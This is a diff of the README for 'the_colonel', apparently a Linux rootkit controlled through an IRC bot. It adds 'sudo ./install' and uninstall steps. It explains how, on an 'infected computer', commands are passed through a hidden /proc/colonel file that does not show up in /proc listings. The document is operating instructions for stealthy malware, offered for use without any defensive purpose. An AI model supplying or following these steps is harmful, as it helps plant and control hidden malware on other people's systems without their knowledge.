bones-codes/the_colonel/README.md

 ## Installation
 Note: channel, server and nickname should be set in irc/bot.py prior to installation.

-...
+To install: `sudo ./install`

+Uninstalling can be accomplished by running `./uninstall`.

 ## Usage
 From infected computer:

-`cat /proc/colonel` to see available commands.
+`cat /proc/colonel` to see available commands. _File will not be visible on content listing of /proc.

 To pass commands use the included program: `./rtcmd <command>` or echo: `echo -n <command> >> /proc/colonel`